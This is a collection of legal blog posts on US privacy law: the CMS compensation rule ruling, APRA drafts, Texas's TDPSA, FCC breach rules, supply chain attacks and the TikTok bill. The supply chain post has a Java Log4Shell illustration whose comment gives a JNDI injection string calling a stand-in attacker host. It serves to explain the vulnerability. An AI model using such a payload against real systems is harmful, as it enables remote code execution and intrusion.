“Arbitrary and Capricious” – A Sign of Things to Come?

On July 3, 2024, the U.S. District Court for the Northern District of Texas issued a Memorandum Opinion and Order in the combined cases of Americans for Beneficiary Choice, et al. v. United States Department of Health and Human Services (Civ. Action No. 4:24-cv-00439) and Council for Medicare Choice, et al. v. United States Department of Health and Human Services (Civ. Action No. 4:24-cv-00446).

The Plaintiffs in these combined cases challenged a Centers for Medicare and Medicaid Services (“CMS”) rule issued earlier this year. The new rule pulls reimbursements paid to third-party firms into the definition of compensation, which is subject to a regulatory cap; the prior rules did not include such reimbursements in that definition.

The Memorandum Opinion and Order granted the Plaintiffs’ Motion for a Stay in part and denied it in part. The Motion was granted in relation to the new CMS rules around compensation paid by Medicare Advantage and Part D plans to independent agents and brokers who help beneficiaries select and enroll in private plans.

The Court found that the compensation changes were arbitrary and capricious and that the Plaintiffs were substantially likely to succeed on the merits of the case. The Court found that CMS failed to substantiate key parts of the final rule. During the rulemaking process, industry commenters asked for clarification around parts of the rule, but CMS claimed “the sources Plaintiffs criticized were not significant enough to warrant defending them.” The Court found “because CMS failed to address important problems to their central evidence…that members of the public raised during the comment period, those aspects of the Final Rule are most likely arbitrary and capricious.”

One of the Plaintiffs, Americans for Beneficiary Choice, also challenged the consent requirement of the final rule. The final rule states that personal beneficiary data collected by a third-party marketing organization (“TPMO”) may only be shared with another TPMO if the beneficiary gives prior express written consent. The Plaintiff argued that the consent requirement is “in tension with HIPAA’s broader purpose of facilitating data sharing”; CMS responded that although HIPAA may facilitate data sharing, that does not restrict CMS’s ability to limit certain harmful data-sharing practices. The Court denied the Motion to Stay regarding the consent requirement, but interestingly stated that while the Plaintiff’s “claim regarding the Consent Requirement may ultimately have merit, [Plaintiff]’s current briefing does not demonstrate a substantial likelihood of success at this stage”.

What does this mean now that we are less than 90 days from the start of the 2025 Medicare Advantage/Part D contract year?

  1. The consent requirement is still moving forward – While the Memorandum Opinion and Order hints at the possibility that the requirement may ultimately be rejected, as of right now, TPMOs must get prior express written consent before sharing personal beneficiary data with another TPMO.
  2. The fixed-fee and contract-terms restrictions in the final rule have had their effective dates stayed until this suit is resolved. Therefore, for those two provisions, the compensation scheme that was in place last year essentially remains in effect.

How does this affect the FCC’s 1:1 Ruling?

It doesn’t. While this case does show that courts are willing to look critically at agencies’ rulemaking processes, the FCC’s 1:1 consent requirement is different from the compensation changes set forth by CMS.

The FCC arguably just clarified the existing rule around prior express written consent by requiring the consent to “authorize no more than one identified seller”.

CMS, on the other hand, attempted to make wholesale changes and “began to set fixed rates for a wide range of administrative payments that were previously uncapped and unregulated as compensation.”

The IMC case against the FCC is still pending, so there is a possibility (albeit small) of relief coming in that case. However, the advice here is to continue planning to obtain consent to share personal beneficiary data AND single-seller consent.

House Committee Postpones Markup Amid New Privacy Bill Updates

On June 27, 2024, the U.S. House of Representatives cancelled the House Energy and Commerce Committee markup of the American Privacy Rights Act (“APRA” or “Bill”) scheduled for that day, reportedly with little notice. There has been no indication of when the markup will be rescheduled; however, House Energy and Commerce Committee Chairwoman Cathy McMorris Rodgers issued a statement reiterating her support for the legislation.

On June 20, 2024, the House posted a third version of the discussion draft of the APRA. On June 25, 2024, two days before the scheduled markup session, Committee members introduced the APRA as a bill, H.R. 8818. Each version featured several key changes from earlier drafts, which are outlined collectively below.

Notable changes in H.R. 8818 include the removal of two key sections:

  • “Civil Rights and Algorithms,” which required entities to conduct covered algorithm impact assessments when algorithms posed a consequential risk of harm to individuals or groups; and
  • “Consequential Decision Opt-Out,” which allowed individuals to opt out of being subjected to covered algorithms.

Additional changes include the following:

  • The Bill introduces new definitions, such as “coarse geolocation information” and “online activity profile,” the latter of which refines a category of sensitive data. “Neural data” and “information that reveals the status of an individual as a member of the Armed Forces” are added as new categories of sensitive data. The Bill also modifies the definitions of “contextual advertising” and “first-party advertising.”
  • The data minimization section includes a number of changes, such as the addition of “conduct[ing] medical research” in compliance with applicable federal law as a new permitted purpose. The Bill also limits the ability to rely on permitted purposes when processing sensitive covered data, including biometric and genetic information.
  • The Bill now allows not only covered entities (excluding data brokers or large data holders), but also service providers (that are not large data holders) to apply for the Federal Trade Commission-approved compliance guideline mechanism.
  • Protections for covered minors now include a prohibition on first-party advertising (in addition to targeted advertising) if the covered entity knows the individual is a minor, with limited exceptions acknowledged by the Bill. It also restricts the transfer of a minor’s covered data to third parties.
  • The Bill adds another preemption clause, clarifying that APRA would preempt any state law providing protections for children or teens to the extent such laws conflict with the Bill, but does not prohibit states from enacting laws, rules or regulations that offer greater protection to children or teens than the APRA.

For additional information about the changes, please refer to the unofficial redline comparison of all APRA versions published by the IAPP.

The Privacy Patchwork: Beyond US State “Comprehensive” Laws

We’ve cautioned before about the danger of thinking only about US state “comprehensive” laws when assessing legal privacy and data security obligations in the United States. We’ve also mentioned that the US has a patchwork of privacy laws. That patchwork exists to a certain extent outside of the US as well. What laws exist in the patchwork that relate to a company’s activities?

There are laws that apply when companies host websites, including the most well-known, the California Online Privacy Protection Act (CalOPPA). It has been in effect since July 2004, predating the California Consumer Privacy Act by 14 years. Then there are laws that apply if a company is collecting and using biometric identifiers, like Illinois’ Biometric Information Privacy Act.

Companies are subject to specific laws both in the US and elsewhere when engaging in digital communications. These laws include the US federal laws TCPA and TCFAPA, as well as CAN-SPAM. Digital communication laws exist in countries as wide-ranging as Australia, Canada, Morocco, and many others. Then we have laws that apply when collecting information during a credit card transaction, like the Song-Beverly Credit Card Act (California).

Putting It Into Practice: When assessing your company’s obligations under privacy and data security laws, keep activity-specific privacy laws in mind. Depending on what you are doing, and in what jurisdictions, you may have more obligations to address than simply those found in comprehensive privacy laws.

American Privacy Rights Act Advances with Significant Revisions

On May 23, 2024, the U.S. House Committee on Energy and Commerce Subcommittee on Data, Innovation, and Commerce approved a revised draft of the American Privacy Rights Act (“APRA”), which was released just 36 hours before the markup session. With the subcommittee’s approval, the APRA will now advance to full committee consideration. The revised draft includes several notable changes from the initial discussion draft, including:

  • New Section on COPPA 2.0 – the revised APRA draft includes the Children’s Online Privacy Protection Act (COPPA 2.0) under Title II, which differs to a certain degree from the COPPA 2.0 proposal currently before the Senate (e.g., removal of the revised “actual knowledge” standard; removal of applicability to teens over age 12 and under age 17).
  • New Section on Privacy By Design – the revised APRA draft includes a new dedicated section on privacy by design. This section requires covered entities, service providers and third parties to establish, implement, and maintain reasonable policies, practices and procedures that identify, assess and mitigate privacy risks related to their products and services during the design, development and implementation stages, including risks to covered minors.
  • Expansion of Public Research Permitted Purpose – as an exception to the general data minimization obligation, the revised APRA draft adds another permissible purpose for processing data for public or peer-reviewed scientific, historical, or statistical research projects. These research projects must be in the public interest and comply with all relevant laws and regulations. If the research involves transferring sensitive covered data, the revised APRA draft requires the affirmative express consent of the affected individuals.
  • Expanded Obligations for Data Brokers – the revised APRA draft expands obligations for data brokers by requiring them to include a mechanism for individuals to submit a “Delete My Data” request. This mechanism, similar to the California Delete Act, requires data brokers to delete all covered data related to an individual that they did not collect directly from that individual, if the individual so requests.
  • Changes to Algorithmic Impact Assessments – while the initial APRA draft required large data holders to conduct and report a covered algorithmic impact assessment to the FTC if they used a covered algorithm posing a consequential risk of harm to individuals, the revised APRA requires such impact assessments for covered algorithms to make a “consequential decision.” The revised draft also allows large data holders to use certified independent auditors to conduct the impact assessments, directs the reporting mechanism to NIST instead of the FTC, and expands requirements related to algorithm design evaluations.
  • Consequential Decision Opt-Out – while the initial APRA draft allowed individuals to invoke an opt-out right against covered entities’ use of a covered algorithm making or facilitating a consequential decision, the revised draft now also allows individuals to request that consequential decisions be made by a human.
  • New and/or Revised Definitions – the revised APRA draft’s definition section includes new terms, such as “contextual advertising” and “first-party advertising.” The revised APRA draft also redefines certain terms, including “covered algorithm,” “sensitive covered data,” “small business” and “targeted advertising.”

On July 1, 2024, Texas May Have the Strongest Consumer Data Privacy Law in the United States

It’s Bigger. But is it Better?

They say everything is bigger in Texas, and that now includes privacy protection. After HB 4, the Texas Data Privacy and Security Act (“TDPSA”), was signed into law on June 18, 2023, Texas became the eleventh state to enact comprehensive privacy legislation.[1]

Like many state consumer data privacy laws enacted this year, TDPSA is largely modeled after the Virginia Consumer Data Protection Act.[2] However, the law contains several unique differences and drew significant pieces from recently enacted consumer data privacy laws in Colorado and Connecticut, which generally include “stronger” provisions than the more “business-friendly” laws passed in states like Utah and Iowa.

Some of the more notable provisions of the bill are described below:

More Scope Than You Can Shake a Stick At!

  • The TDPSA applies much more broadly than any other pending or effective state consumer data privacy act, pulling in individuals as well as businesses regardless of their revenues or the number of individuals whose personal data is processed or sold.
  • The TDPSA applies to any individual or business that meets all of the following criteria:
    • conducts business in Texas (or produces goods or services consumed in Texas); and
    • processes or sells personal data:
      • The “processing or sale of personal data” further expands the applicability of the TDPSA to include individuals and businesses that engage in any operations involving personal data, such as the “collection, use, storage, disclosure, analysis, deletion, or modification of personal data.”
      • In short, collecting, storing or otherwise handling the personal data of any resident of Texas, or transferring that data for any consideration, will likely meet this standard.
  • Uniquely, the carveout for “small businesses” excludes from coverage those entities that meet the definition of “a small business as defined by the United States Small Business Administration.”[3]
  • The law requires all businesses, including small businesses, to obtain opt-in consent before processing sensitive personal data.
  • Similar to other state comprehensive privacy laws, TDPSA excludes state agencies or political subdivisions of Texas, financial institutions subject to Title V of the Gramm-Leach-Bliley Act, covered entities and business associates governed by HIPAA, nonprofit organizations, and institutions of higher education. But, TDPSA uniquely excludes electric utilities, power generation companies, and retail electric providers, as defined under Section 31.002 of the Texas Utilities Code.
  • Certain categories of information are also excluded, including health information protected by HIPAA or used in connection with human clinical trials, and information covered by the Fair Credit Reporting Act, the Driver’s Privacy Protection Act, the Family Educational Rights and Privacy Act of 1974, the Farm Credit Act of 1971, emergency contact information used for emergency contact purposes, and data necessary to administer benefits.

Don’t Mess with Texas Consumers

Texas’s longstanding libertarian roots are evidenced in the TDPSA’s strong menu of individual consumer privacy rights, including the right to:

  • Confirm whether a controller is processing the consumer’s personal data and access that data;
  • Correct inaccuracies in the consumer’s personal data, considering the nature of the data and the purposes of the processing;
  • Delete personal data provided by or obtained about the consumer;
  • Obtain a copy of the consumer’s personal data that the consumer previously provided to a controller in a portable and readily usable format, if the data is available digitally and it is technically feasible; and
  • Opt out of the processing of personal data for purposes of targeted advertising, the sale of personal data, or profiling in furtherance of a decision that produces legal or similarly significant effects concerning the consumer.

Data controllers are required to respond to consumer requests within 45 days, which may be extended by 45 days when reasonably necessary. The bill would also give consumers a right to appeal a controller’s refusal to respond to a request.

Controller Hospitality

The Texas bill imposes a number of obligations on data controllers, most of which are similar to other state consumer data privacy laws:

  • Data Minimization – Controllers should limit data collection to what is “adequate, relevant, and reasonably necessary” to achieve the purposes of collection that have been disclosed to a consumer. Consent is required before processing information in ways that are not reasonably necessary or not compatible with the purposes disclosed to a consumer.
  • Nondiscrimination – Controllers may not discriminate against a consumer for exercising individual rights under the TDPSA, including by denying goods or services, charging different rates, or providing different levels of quality.
  • Sensitive Data – Consent is required before processing sensitive data, which includes personal data revealing racial or ethnic origin, religious beliefs, mental or physical health diagnosis, citizenship or immigration status, genetic or biometric data processed for purposes of uniquely identifying an individual, personal data collected from a child known to be under the age of 13, and precise geolocation data.
    • The Senate version of the bill excludes data revealing “sexual orientation” from the categories of sensitive information, which differs from all other state consumer data privacy laws.
  • Privacy Notice – Controllers must post a privacy notice (e.g. website policy) that includes (1) the categories of personal data processed by the controller (including any sensitive data), (2) the purposes for the processing, (3) how consumers may exercise their individual rights under the Act, including the right of appeal, (4) any categories of personal data that the controller shares with third parties and the categories of those third parties, and (5) a description of the methods available to consumers to exercise their rights (e.g., website form or email address).
  • Targeted Advertising – A controller that sells personal data to third parties for purposes of targeted advertising must clearly and conspicuously disclose to consumers their right to opt-out.

Assessing the Privacy of Texans

Unlike some of the “business-friendly” privacy laws in Utah and Iowa, the Texas bill requires controllers to conduct data protection assessments (“Data Privacy Protection Assessments” or “DPPAs”) for certain types of processing that pose heightened risks to consumers. The assessments must identify and weigh the benefits of the processing to the controller, the consumer, other stakeholders, and the public against the potential risks to the consumer as mitigated by any safeguards that could reduce those risks. In Texas, the categories that require assessments are identical to those required by Connecticut’s consumer data privacy law and include:

  • Processing personal data for targeted advertising;
  • The sale of personal data;
  • Processing personal data for profiling consumers, if such profiling presents a reasonably foreseeable risk to consumers of unfair or deceptive treatment, disparate impact, financial, physical or reputational injury, physical or other intrusion upon seclusion of private affairs, or “other substantial injury;”
  • Processing of sensitive data; and
  • Any processing activities involving personal data that present a “heightened risk of harm to consumers.”

Opting Out and About

Businesses are required to recognize a universal opt-out mechanism for consumers (e.g., a Global Privacy Control signal), similar to provisions in Colorado, Connecticut, California, and Montana, but the law also gives businesses more leeway to ignore those signals if they cannot verify the consumer’s identity or lack the technical ability to receive the signal.
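For context on how such a signal actually reaches a business, the minimal sketch below shows one way a web application might detect the Global Privacy Control header that participating browsers send with each request. This is an illustration only; the class and method names are hypothetical, and nothing in the TDPSA prescribes a particular implementation.

```java
import javax.servlet.http.HttpServletRequest;

// Hypothetical helper for detecting the Global Privacy Control (GPC) signal.
// Browsers with GPC enabled send the "Sec-GPC: 1" request header.
public final class GpcSignal {

    private GpcSignal() {}

    // Returns true when the browser has asserted a universal opt-out via GPC.
    public static boolean isOptOutAsserted(HttpServletRequest request) {
        return "1".equals(request.getHeader("Sec-GPC"));
    }
}
```

A controller might run a check like this before selling personal data or processing it for targeted advertising in response to the request, subject to the identity-verification and technical-feasibility caveats noted above.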

Show Me Some Swagger!

The Attorney General has the exclusive right to enforce the law, with violations punishable by civil penalties of up to $7,500 per violation. Businesses have a 30-day right to cure violations upon written notice from the Attorney General. Unlike several other laws, the right to cure has no sunset provision and would remain a permanent part of the law. The law does not include a private right of action.

Next Steps for TDPSA Compliance

For businesses that have already developed a state privacy compliance program, especially those modeled around Colorado and Connecticut, making room for TDPSA will be a streamlined exercise. However, businesses that are starting from ground zero, especially “small businesses” defined in the law, need to get moving.

If TDPSA is your first ride in a state consumer privacy compliance rodeo, some first steps we recommend are:

  1. Update your website privacy policy for facial compliance with the law and make sure that notice is being given at or before the time of collection.
  2. Put procedures in place to respond to consumer privacy requests and ask for consent before processing sensitive information.
  3. Gather necessary information to complete data protection assessments.
  4. Identify vendor contracts that should be updated with mandatory data protection terms.

Footnotes

[1] As of date of publication, there are now 17 states that have passed state consumer data privacy laws (California, Colorado, Connecticut, Delaware, Florida, Indiana, Iowa, Kentucky, Maryland, Massachusetts, Montana, New Jersey, New Hampshire, Tennessee, Texas, Utah, Virginia) and two (Vermont and Minnesota) that are pending.

[2] See Code of Virginia – Chapter 53, Consumer Data Protection Act

[3] This is notably broader than other state privacy laws, which establish threshold requirements based on revenues or the amount of personal data that a business processes. It will also make it more difficult to know what businesses are covered because SBA definitions vary significantly from one industry vertical to another. As a quick rule of thumb, under the current SBA size standards, a U.S. business with annual average receipts of less than $2.25 million and fewer than 100 employees will likely be small, and therefore exempt from the TDPSA’s primary requirements.


Mid-Year Recap: Think Beyond US State Laws!

Much of the focus on US privacy has been US state laws, and the potential of a federal privacy law. This focus can lead one to forget, however, that US privacy and data security law follows a patchwork approach both at a state level and a federal level. “Comprehensive” privacy laws are thus only one piece of the puzzle. There are federal and state privacy and security laws that apply based on a company’s (1) industry (financial services, health care, telecommunications, gaming, etc.), (2) activity (making calls, sending emails, collecting information at point of purchase, etc.), and (3) the type of individual from whom information is being collected (children, students, employees, etc.). There have been developments this year in each of these areas.

On the industry side, there has been activity focused on data brokers, companies in the health space, and those that sell motor vehicles. The FTC has focused on the activities of data brokers this year, beginning the year with a settlement with lead-generation company Response Tree. It also settled with X-Mode Social over the company’s collection and use of sensitive information. There has also been ongoing regulation and scrutiny of companies in the health space, including HHS’s new AI transparency rule. Finally, Utah enacted a Motor Vehicle Data Protection Act applicable to data systems used by car dealers to house consumer information.

On the activity side, there has been less news, although in this area the “activity” of protecting information (or failing to do so) has continued to receive regulatory focus. This includes the SEC’s new cybersecurity reporting obligations for public companies, as well as minor modifications to Utah’s data breach notification law.

Finally, there have been new laws directed at particular individuals, in particular laws intended to protect children. These include social media laws in Florida and Utah, effective January 1, 2025 and October 1, 2024, respectively. These are similar to attempts to regulate social media’s collection of information from children in Arkansas, California, Ohio and Texas, but the drafters hope they are sufficiently different to survive the challenges those laws currently face. The FTC is also exploring updates to its decades-old rule under the Children’s Online Privacy Protection Act.

Putting It Into Practice: As we approach the mid-point of the year, now is a good time to look back at privacy developments over the past six months. There have been many developments in the privacy patchwork, and companies may want to take the time now to ensure that their privacy programs have incorporated and addressed those laws’ obligations.


Congress Introduces Promising Bipartisan Privacy Bill

U.S. Senator Maria Cantwell (D-WA) and U.S. Representative Cathy McMorris Rodgers (R-WA) have made a breakthrough by agreeing on a bipartisan data privacy legislation proposal. The legislation aims to address concerns related to consumer data collection by technology companies and empower individuals to have control over their personal information.

The proposed legislation would restrict the amount of data technology companies can collect from consumers, a significant limit given the volume of data those companies already hold. It would also:

  • Grant Americans the authority to prevent the sale of their personal information or to request its deletion, giving individuals more control over their personal data;
  • Give the Federal Trade Commission (FTC) and state attorneys general significant authority to monitor and regulate matters related to consumer privacy;
  • Include robust enforcement measures, such as granting individuals the right to take legal action, so that violations of the legislation can be dealt with effectively;
  • Allow consumers to opt out of targeted advertising, which would not be prohibited outright, giving them more control over the ads they receive;
  • Apply the legislation’s privacy violations to telecommunications companies, ensuring that no company is exempt from consumer privacy laws; and
  • Require annual assessments of algorithms to ensure they do not harm individuals, particularly young people, an important safeguard given technology’s growing impact on younger generations.

The bipartisan proposal for data privacy legislation is a positive step forward in terms of consumer privacy in America. While there is still work to be done, it is essential that the government takes proactive steps to ensure that individuals have greater control over their personal data. This is a positive development for the tech industry and consumers alike.

However, as we have reported before, this is not the first time Congress has made strides toward comprehensive data privacy legislation. Hopefully, this new bipartisan bill will enjoy more success than past efforts and bring the United States closer in line with international data privacy standards.

Supply Chains are the Next Subject of Cyberattacks

The cyberthreat landscape is evolving as threat actors develop new tactics to keep up with increasingly sophisticated corporate IT environments. In particular, threat actors are increasingly exploiting supply chain vulnerabilities to reach downstream targets.

The effects of supply chain cyberattacks are far-reaching: they can affect downstream organizations and can last long after the attack was first deployed. According to an Identity Theft Resource Center report, “more than 10 million people were impacted by supply chain attacks targeting 1,743 entities that had access to multiple organizations’ data” in 2022. Based upon an IBM analysis, the cost of a data breach averaged $4.45 million in 2023.

What is a supply chain cyberattack?

Supply chain cyberattacks are a type of cyberattack in which a threat actor targets a business offering third-party services to other companies. The threat actor will then leverage its access to the target to reach and cause damage to the business’s customers. Supply chain cyberattacks may be perpetrated in different ways.

  • Software-Enabled Attack: This occurs when a threat actor uses an existing software vulnerability to compromise the systems and data of organizations running the software containing the vulnerability. For example, Apache Log4j is open-source code that developers use in software to record system activity. In November 2021, there were public reports of a Log4j remote code execution vulnerability that allowed threat actors to infiltrate target software running on outdated Log4j code versions. As a result, threat actors gained access to the systems, networks, and data of many organizations in the public and private sectors that used software containing the vulnerable Log4j version. Although security upgrades (i.e., patches) have since been issued to address the Log4j vulnerability, many applications are still running with outdated (i.e., unpatched) versions of Log4j. (An illustrative code sketch of this pattern follows this list.)
  • Software Supply Chain Attack: This is the most common type of supply chain cyberattack, and occurs when a threat actor infiltrates and compromises software with malicious code either before the software is provided to consumers or by deploying malicious software updates masquerading as legitimate patches. All users of the compromised software are affected by this type of attack. For example, Blackbaud, Inc., a software company providing cloud hosting services to for-profit and non-profit entities across multiple industries, was ground zero for a software supply chain cyberattack after a threat actor deployed ransomware in its systems that had downstream effects on Blackbaud’s customers, including 45,000 companies. Similarly in May 2023, Progress Software’s MOVEit file-transfer tool was targeted with a ransomware attack, which allowed threat actors to steal data from customers that used the MOVEit app, including government agencies and businesses worldwide.
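To make the Log4j example above concrete, the sketch below shows the kind of ordinary logging code that the vulnerability turned into an entry point. The class and variable names are hypothetical; the point is that, on an unpatched Log4j 2.x version, logging attacker-controlled input could trigger a JNDI lookup and remote code execution.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Hypothetical request handler, shown only to illustrate the Log4Shell pattern.
public class LoginHandler {

    private static final Logger logger = LogManager.getLogger(LoginHandler.class);

    public void handleLogin(String username) {
        // Ordinary-looking logging of user-supplied input. On unpatched Log4j 2.x
        // (CVE-2021-44228), a value such as "${jndi:ldap://attacker.example/a}"
        // was treated as a JNDI lookup, allowing the attacker to load and run
        // remote code. Patched releases no longer perform this substitution.
        logger.info("Login attempt for user: " + username);
    }
}
```

Upgrading to a patched Log4j release closes this path, which is one reason inventorying and updating third-party components is a core supply chain defense.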

Legal and Regulatory Risks

Cyberattacks can often expose personal data to unauthorized access and acquisition by a threat actor. When this occurs, companies’ notification obligations under the data breach laws of jurisdictions in which affected individuals reside are triggered. In general, data breach laws require affected companies to submit notice of the incident to affected individuals and, depending on the facts of the incident and the number of such individuals, also to regulators, the media, and consumer reporting agencies. Companies may also have an obligation to notify their customers, vendors, and other business partners based on their contracts with these parties. These reporting requirements increase the likelihood of follow-up inquiries, and in some cases, investigations by regulators. Reporting a data breach also increases a company’s risk of being targeted with private lawsuits, including class actions and lawsuits initiated by business customers, in which plaintiffs may seek different types of relief including injunctive relief, monetary damages, and civil penalties.

The legal and regulatory risks in the aftermath of a cyberattack can persist long after a company has addressed the immediate issues that caused the incident. For example, in the aftermath of its cyberattack, Blackbaud was investigated by multiple government authorities and targeted with private lawsuits. While the private suits remain ongoing, Blackbaud settled with state regulators ($49,500,000), the U.S. Federal Trade Commission, and the U.S. Securities and Exchange Commission (SEC) ($3,000,000) in 2023 and 2024, almost four years after it first experienced the cyberattack. Other companies that experienced high-profile cyberattacks have also been targeted with securities class action lawsuits by shareholders, and in at least one instance, regulators have named a company’s Chief Information Security Officer in an enforcement action, underscoring the professional risks cyberattacks pose to corporate security leaders.

What Steps Can Companies Take to Mitigate Risk?

First, threat actors will continue to refine their tactics and techniques, so all organizations must adapt and stay current with the regulations and legislation surrounding cybersecurity. The Cybersecurity and Infrastructure Security Agency (CISA) urges developer education on creating secure code and verifying third-party components.

Second, stay proactive. Organizations must re-examine not only their own security practices but also those of their vendors and third-party suppliers. If third and fourth parties have access to an organization’s data, it is imperative to ensure that those parties have good data protection practices.

Third, companies should adopt guidelines for suppliers around data and cybersecurity at the outset of a relationship, since it may be difficult to get suppliers to adhere to policies after the contract has been signed. For example, some entities have detailed processes requiring suppliers to report attacks and conduct impact assessments after the fact. In addition, some entities expect suppliers to follow specific sequences of steps after a cyberattack. At the same time, some entities may also apply the same threat intelligence that they use for their own defense to their critical suppliers, and may require suppliers to implement proactive security controls, such as incident response plans, ahead of an attack.

Finally, all companies should strive to minimize threats to their software supply by establishing strong security strategies at the ground level.

FCC Updated Data Breach Notification Rules Go into Effect Despite Challenges

On March 13, 2024, the Federal Communications Commission’s updates to the FCC data breach notification rules (the “Rules”) went into effect. They were adopted in December 2023 pursuant to an FCC Report and Order (the “Order”).

The Rules went into effect despite legal challenges now consolidated in the United States Court of Appeals for the Sixth Circuit. Two trade groups, the Ohio Telecom Association and the Texas Association of Business, petitioned the United States Courts of Appeals for the Sixth and Fifth Circuits, respectively, to vacate the FCC’s Order modifying the Rules. The Order was published in the Federal Register on February 12, 2024, and the petitions were filed shortly thereafter. The challenges, which the United States Judicial Panel on Multidistrict Litigation consolidated in the Sixth Circuit, argue that the Rules exceed the FCC’s authority and are arbitrary and capricious. The Order addresses the argument that the Rules are “substantially the same” as breach rules nullified by Congress in 2017. The challenges, however, have not progressed since the Rules went into effect.

Read our previous blog post to learn more about the Rules.


U.S. House of Representatives Passes Bill to Ban TikTok Unless Divested from ByteDance

Yesterday, with broad bipartisan support, the U.S. House of Representatives voted overwhelmingly (352-65) to support the Protecting Americans from Foreign Adversary Controlled Applications Act, designed to begin the process of banning TikTok’s use in the United States. This is music to my ears. See a previous blog post on this subject.

The Act would penalize app stores and web hosting services that host TikTok while it is owned by Chinese-based ByteDance. However, if the app is divested from ByteDance, the Act will allow use of TikTok in the U.S.

National security experts have warned legislators and the public that downloading and using TikTok poses a national security threat. The threat arises because ByteDance’s owner is required by Chinese law to share users’ data with the Chinese Communist government. When users download the app, TikTok obtains access to their microphones, cameras, and location services, essentially placing spyware on over 170 million Americans’ every move (dance or not).

Lawmakers are concerned about the detailed sharing of Americans’ data with one of its top adversaries and the ability of TikTok’s algorithms to influence and launch disinformation campaigns against the American people. The Act will make its way through the Senate, and if passed, President Biden has indicated that he will sign it. This is a big win for privacy and national security.

